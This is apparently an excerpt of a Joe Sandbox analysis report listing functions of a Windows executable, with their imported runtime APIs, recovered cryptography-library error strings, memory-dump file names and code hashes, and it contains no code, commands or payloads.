_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B7EA0

Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE182
Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE190

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B7EDF
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B7F2E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B7F7D

Strings

was called before , xrefs: 00007FF6F18B7DA5, 00007FF6F18B7DC7

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memmove
String ID: was called before
API String ID: 15630516-2150420595
Opcode ID: d4e73a5aeac07a623666490df74cfe958e1124317c6a1cfaa48631eac3e7ad41
Instruction ID: a5317fb0dc7acd0a26341488d3bc7182fdfcf921bd252351568978030972516e
Opcode Fuzzy Hash: d4e73a5aeac07a623666490df74cfe958e1124317c6a1cfaa48631eac3e7ad41
Instruction Fuzzy Hash: CC91A162F24B8586FB10DB74D6403AC2762AB957E8F005731DE7C567E6EF38A184C340

Function 00007FF6F18B85A0 Relevance: 10.7, APIs: 3, Strings: 4, Instructions: 202COMMON

Download Yara Rule

APIs

_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B8711
_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B87B6
_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B8866

Strings

: header length of , xrefs: 00007FF6F18B8754
exceeds the maximum of , xrefs: 00007FF6F18B8778, 00007FF6F18B8829
: additional authenticated data (AAD) cannot be input after data to be encrypted or decrypted, xrefs: 00007FF6F18B86E4
: footer length of , xrefs: 00007FF6F18B8805

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: ExceptionThrow
String ID: exceeds the maximum of $: additional authenticated data (AAD) cannot be input after data to be encrypted or decrypted$: footer length of $: header length of
API String ID: 432778473-2663654317
Opcode ID: dc87a9ae9e00b5eb09dca8e8cf4c525225d15c7920e56458db9653b6e155c2c6
Instruction ID: 3c2da94df0946f26b4d7159af3f3fe381fb1164d7482794fd07474031a3b5c74
Opcode Fuzzy Hash: dc87a9ae9e00b5eb09dca8e8cf4c525225d15c7920e56458db9653b6e155c2c6
Instruction Fuzzy Hash: 21719F62B29A4296EB11DB62D9542EEB361FB45BC8F404036CB6D877D6FF2CD909C340

Function 00007FF6F18B0680 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6F18B0768
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B081C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B085B

Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE182
Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE190

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B08AA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B08E9

Strings

is not a valid key length, xrefs: 00007FF6F18B075E, 00007FF6F18B0780

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memmove
String ID: is not a valid key length
API String ID: 15630516-2125742942
Opcode ID: 5466e96c30f257f14cc2d3733b83eb2cc9a5a36840e37005ccf9e511bb6b62bf
Instruction ID: 3294bbdd95298b29c0fb7b912616a5b3f13bc1af936e814681b07bdf39c976da
Opcode Fuzzy Hash: 5466e96c30f257f14cc2d3733b83eb2cc9a5a36840e37005ccf9e511bb6b62bf
Instruction Fuzzy Hash: 1C71B162F24B4685FB10DBA5E6403AC2371AB457E8F404232DA7C96BD9EF3DE195C380

Function 00007FF6F18A91D0 Relevance: 10.7, APIs: 7, Instructions: 178COMMON

Download Yara Rule

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6F18A9282

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: fgetc
String ID:
API String ID: 2807381905-0
Opcode ID: e753ba6b9e98875d194165224c38d002e547872cb52e533535491e2effe78cad
Instruction ID: dc845858e68759599d55b6fdcae0b706f4767b799e3c9cf05b54a38280333115
Opcode Fuzzy Hash: e753ba6b9e98875d194165224c38d002e547872cb52e533535491e2effe78cad
Instruction Fuzzy Hash: 5C914C32F28A819AEB108F65D5903AC37B4FB487A8F541636DA7E97AD4EF38D554C300

Function 00007FF6F18A9F50 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 166COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6F18AA029
memmove.VCRUNTIME140 ref: 00007FF6F18AA037
memmove.VCRUNTIME140 ref: 00007FF6F18AA04D
_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18AA0EE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6F18AA128

Part of subcall function 00007FF6F18ABE30: memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,00007FF6F18A2165), ref: 00007FF6F18ABF0C

Strings

StringSink: OutputStringPointer not specified, xrefs: 00007FF6F18AA0C1
OutputStringPointer, xrefs: 00007FF6F18AA0A8

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: memmove$ExceptionThrowfree
String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
API String ID: 3245812352-1331214609
Opcode ID: 7d6a9c0d6a6b2d83d7e63deb167212ca25c9f79112630aad070347e4ae4bb3de
Instruction ID: 328557e77ed85434f7fb4946e88a1897d23674fd50764861f0aa9db47d707a74
Opcode Fuzzy Hash: 7d6a9c0d6a6b2d83d7e63deb167212ca25c9f79112630aad070347e4ae4bb3de
Instruction Fuzzy Hash: A7519E62B28A86A2EF50DB19D6442E86361FB44BC4F944432DA3D87BE5EF7DD54BC300

Function 00007FF6F18AE490 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF6F18CDEB0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF6F18AC6D5), ref: 00007FF6F18CDECA

memmove.VCRUNTIME140 ref: 00007FF6F18AE598
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AE642
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AE681

Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE182
Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE190

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AE6D0

Strings

" not used, xrefs: 00007FF6F18AE58E, 00007FF6F18AE5B0
er ", xrefs: 00007FF6F18AE501

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemmove$malloc
String ID: " not used$er "
API String ID: 104515685-1755945580
Opcode ID: bc87fd1883b4d7b253673734ee45bad49037b993acd2705b915a5ecd4608f386
Instruction ID: 7a3156f909d0029c2b19aa5955d496f53d823aee8c863f7829b68a01fcf35b79
Opcode Fuzzy Hash: bc87fd1883b4d7b253673734ee45bad49037b993acd2705b915a5ecd4608f386
Instruction Fuzzy Hash: 3F716062F28B869AEB00DB74D6413AC3361EB99798F409731DABC526D5EF78E190C340

Function 00007FF6F18B0240 Relevance: 10.6, APIs: 7, Instructions: 147COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,00007FF6F18AFB7D), ref: 00007FF6F18B02DC
memmove.VCRUNTIME140(?,?,?,00007FF6F18AFB7D), ref: 00007FF6F18B0320
memmove.VCRUNTIME140(?,?,?,00007FF6F18AFB7D), ref: 00007FF6F18B0338
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6F18AFB7D), ref: 00007FF6F18B03C0
memmove.VCRUNTIME140(?,?,?,00007FF6F18AFB7D), ref: 00007FF6F18B03ED
memmove.VCRUNTIME140(?,?,?,00007FF6F18AFB7D), ref: 00007FF6F18B0408
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18B0433

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: 13262152cef2d685ce502532d0732174b4da82677d670bac0cc5da0e97aa084e
Instruction ID: 7342ba2284cc03645d671e5c779ab3bb7a394c7e24f95b1a7d532f9e9f9a6b2e
Opcode Fuzzy Hash: 13262152cef2d685ce502532d0732174b4da82677d670bac0cc5da0e97aa084e
Instruction Fuzzy Hash: 3C51C122A19B8182EB10EF25E24426E2361FB14BC4F144632DF7C977D5EF79E195D380

Function 00007FF6F18A4C30 Relevance: 10.6, APIs: 7, Instructions: 140COMMON

Download Yara Rule

APIs

_Mtx_lock.MSVCP140 ref: 00007FF6F18A4C6F
?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF6F18A4C7E
?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF6F18A4C9A
_Cnd_wait.MSVCP140 ref: 00007FF6F18A4CBE
_Mtx_unlock.MSVCP140 ref: 00007FF6F18A4CDC
_Mtx_unlock.MSVCP140 ref: 00007FF6F18A4DE2
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 00007FF6F18A4DF3

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: Cpp_error@std@@Mtx_unlockThrow_$Cnd_waitMtx_lockXbad_function_call@std@@
String ID:
API String ID: 3797061655-0
Opcode ID: ce448ce25ec075bdd77bbe3a4ff04929db789a6ce9f7cfffbb7c9b286be97ba5
Instruction ID: 0f0f6141c70eabe263a298e98374816f3464a982976661dca914d6511d803c32
Opcode Fuzzy Hash: ce448ce25ec075bdd77bbe3a4ff04929db789a6ce9f7cfffbb7c9b286be97ba5
Instruction Fuzzy Hash: 03513632629A0592EF54CF21E29063967A5FB84FD4F195136DA6E83BD8EF3CD884C740

Function 00007FF6F18AB860 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF6F18AB88D
??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF6F18AB8A7
?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF6F18AB8D9
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF6F18AB904
std::_Facet_Register.LIBCPMT ref: 00007FF6F18AB91D
??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF6F18AB93C
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18AB967

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
String ID:
API String ID: 762505753-0
Opcode ID: e873d2452dea42ac38c67b0d7febfe25d525863217edc41a1259c3cf3ae6a7a9
Instruction ID: 5726041407090399d1d1530240abd9ec054881297b4d97b75608e7a68697b2ff
Opcode Fuzzy Hash: e873d2452dea42ac38c67b0d7febfe25d525863217edc41a1259c3cf3ae6a7a9
Instruction Fuzzy Hash: D8319032A28B8296EB109F15E5501697760FB88BD4F480632DABD87BE5EF3CE450C700

Function 00007FF6F18B1520 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 175COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6F18B163D
_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B1718
_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B1770
_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B17C8

Strings

: this object requires an IV, xrefs: 00007FF6F18B16E1
: this object cannot use a null IV, xrefs: 00007FF6F18B1739, 00007FF6F18B1791

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: ExceptionThrow$free
String ID: : this object cannot use a null IV$: this object requires an IV
API String ID: 3129652135-991663960
Opcode ID: 6a07cca9d71d79757b8d3563f30b47b261b62d0e6939ff6434788403e8642e87
Instruction ID: 37aebe3c90882e45347698f665169ffb572d3c0ab7bcdde0bdcff6aa50bdfafa
Opcode Fuzzy Hash: 6a07cca9d71d79757b8d3563f30b47b261b62d0e6939ff6434788403e8642e87
Instruction Fuzzy Hash: C171A032618B8291DB20CF15E6902AEB761FB89BD4F444132DBAD83BA8EF3CD155C700

Function 00007FF6F18C6F30 Relevance: 9.1, APIs: 6, Instructions: 145COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF6F18C6FE2
memset.VCRUNTIME140 ref: 00007FF6F18C700B
memset.VCRUNTIME140 ref: 00007FF6F18C70A0
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18C70A5
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18C70B1
memmove.VCRUNTIME140 ref: 00007FF6F18C70DE

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: memset$_errno_invalid_parameter_noinfomemmove
String ID:
API String ID: 988461243-0
Opcode ID: d388a73eacfb0d8efebcfeb8c89fb54283450912c3a4d37f4e97b0b20a4d2332
Instruction ID: 631defb16974944dea362d0460127bc43dfc048a506ed31343a93e4e452b3292
Opcode Fuzzy Hash: d388a73eacfb0d8efebcfeb8c89fb54283450912c3a4d37f4e97b0b20a4d2332
Instruction Fuzzy Hash: 76518076A1464186EB58DF2A964427E7BA2FB89FD0F048135DF3A43B94EF38D451C700

Function 00007FF6F18ABC60 Relevance: 9.1, APIs: 6, Instructions: 133COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,?,00000000,?,00000000,?,00007FF6F18A2165), ref: 00007FF6F18ABD7B
memmove.VCRUNTIME140(?,?,?,?,00000000,?,00000000,?,00007FF6F18A2165), ref: 00007FF6F18ABD8B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,?,00000000,?,00007FF6F18A2165), ref: 00007FF6F18ABDC9
memmove.VCRUNTIME140(?,?,?,?,00000000,?,00000000,?,00007FF6F18A2165), ref: 00007FF6F18ABDD3
memmove.VCRUNTIME140(?,?,?,?,00000000,?,00000000,?,00007FF6F18A2165), ref: 00007FF6F18ABDE3
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18ABE1C

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: 1081af1253ae729aec26d4de59bc4163f6f1e4b1446d731471eb2edd27183fd1
Instruction ID: 6d5624ddb74a4ae40d1d34c749ad0e1485d286bf365373fae3d1fdf2c358b4d6
Opcode Fuzzy Hash: 1081af1253ae729aec26d4de59bc4163f6f1e4b1446d731471eb2edd27183fd1
Instruction Fuzzy Hash: 2541BE62729B41A6EB50AB26E6442AD6361FB48BE0F540731DF7D8BBC5EF3CE4518340

Function 00007FF6F18A4FF0 Relevance: 9.1, APIs: 6, Instructions: 130COMMON

Download Yara Rule

APIs

_Mtx_lock.MSVCP140 ref: 00007FF6F18A5033
?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF6F18A5042

Part of subcall function 00007FF6F18A14E0: __std_exception_copy.VCRUNTIME140 ref: 00007FF6F18A1522

?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF6F18A505D
_Mtx_unlock.MSVCP140 ref: 00007FF6F18A5127
_Cnd_signal.MSVCP140 ref: 00007FF6F18A5134
_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18A518B

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: Cpp_error@std@@Throw_$Cnd_signalExceptionMtx_lockMtx_unlockThrow__std_exception_copy
String ID:
API String ID: 99793096-0
Opcode ID: a38fec70a8292ae6589bcd1c9a252a4254410e630b67ce936b01b46defd760ef
Instruction ID: 3798e4ed3cfa966e9924d67cab713adb67b3291792fa5ce351e7b15c096f4bb9
Opcode Fuzzy Hash: a38fec70a8292ae6589bcd1c9a252a4254410e630b67ce936b01b46defd760ef
Instruction Fuzzy Hash: 7C419F22624A4596EB50CF25E9902BD37A4FB49BD8F144135EB6E83BD4EF3CD4C08740

Function 00007FF6F18AE090 Relevance: 9.1, APIs: 6, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6F18AE182
memmove.VCRUNTIME140 ref: 00007FF6F18AE190
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AE1C9
memmove.VCRUNTIME140 ref: 00007FF6F18AE1D3
memmove.VCRUNTIME140 ref: 00007FF6F18AE1E1
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18AE216

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
